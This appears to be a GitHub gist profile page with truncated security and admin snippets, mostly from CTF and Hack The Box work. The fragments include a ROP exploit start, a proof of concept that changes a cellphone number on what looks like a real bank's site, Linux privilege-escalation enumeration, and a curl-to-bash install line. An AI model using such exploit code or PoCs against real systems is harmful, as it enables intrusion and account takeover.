cedric cedriczirtacic

🐗
æ
View GitHub Profile
@cedriczirtacic
cedriczirtacic / decrypt_main.py
Created September 3, 2020 21:27
HTB/headache
import sys
path = sys.argv[1]
main_addr = 0x1faf
main_size = 1749
main_real = ''
main = ''
key = "a15abe90c112d09369d9f9da9a8c046e"
key_len = len(key)
cedriczirtacic / attributes.rb
Created April 20, 2019 23:34 — forked from lizthegrey/attributes.rb
Hardening SSH with 2fa
default['sshd']['sshd_config']['AuthenticationMethods'] = 'publickey,keyboard-interactive:pam'
default['sshd']['sshd_config']['ChallengeResponseAuthentication'] = 'yes'
default['sshd']['sshd_config']['PasswordAuthentication'] = 'no'
#!/bin/bash
# TOR Setup Script
# Author: Nick Busey
#
# This file is meant to get SSH access via Tor to an Ubuntu server in one command.
#
# Quick Usage (as root): $ bash <(curl -s https://gitlab.com/grownetics/devops/raw/master/tor_ssh.sh)
#
# Usage for the paranoid:
cedriczirtacic / wol.py
Created February 12, 2019 16:11
wake-on-lan using scapy
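from scapy.sendrecv import send
from scapy.layers.inet import IP, UDP
from scapy.packet import Raw
from binascii import unhexlify
import sys
# MAC address is given on the command line as aa:bb:cc:dd:ee:ff
magic = unhexlify(sys.argv[1].replace(':', ''))
# Magic packet: 6 bytes of 0xff followed by the MAC repeated 16 times
send(IP(dst="255.255.255.255")/UDP(dport=9)/Raw(load=b'\xff' * 6 + magic * 16))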
cedriczirtacic / vm_admin.sh
Last active April 11, 2022 21:27
quick VBox (headless) admin script
#!/bin/bash
# cedric
# XXX: this is how I prefer to stop a VM, change this at will
PREFERRED_STOP_METHOD="acpipowerbutton"
function perror() { echo -e "$@" 1>&2; }
function vm_exists() {
    local VM=$1
    VBoxManage showvminfo "${VM}" >/dev/null 2>&1
    return $?
#!/usr/bin/python
import logging
from angr import *
from pwn import log
'''
[0x00001080]> afl~com
0x00001173 3 110 sym.comprueba_0
0x000011e1 3 112 sym.comprueba_1
0x00001251 3 116 sym.comprueba_2
cedriczirtacic / rop.py
Created January 14, 2019 16:58
Frolic rop exploit
#!/usr/bin/python
from struct import pack
def little(x):
    return pack('<I', x)
buf_len = 52
libc_addr = 0xb7e19000
system_off = 0x0003ada0
<html>
<head>
<script type="text/javascript" src="https://blue.baccredomatic.com/js/jquery-3.3.1.min.js"></script>
</head>
<body onload="change();">
<p>cellphone change poc</p>
<script type="text/javascript">
function change()
{
var paramsValues = {cellPhoneNumber: "12345678" };

Compile steghide in macOS X

Check if gettext is installed, if not use Homebrew to get it:

$ brew install gettext

Get the gettext library and cpp flags, and configure with those flags:

$ brew info gettext | grep FLAGS
cedriczirtacic / linux_privesc
Created June 14, 2018 23:53 — forked from sckalath/linux_privesc
Linux Privilege Escalation Techniques
// Determine linux distribution and version
cat /etc/issue
cat /etc/*-release
cat /etc/lsb-release
cat /etc/redhat-release
// Determine kernel version - 32 or 64-bit?
cat /proc/version
uname -a
uname -mrs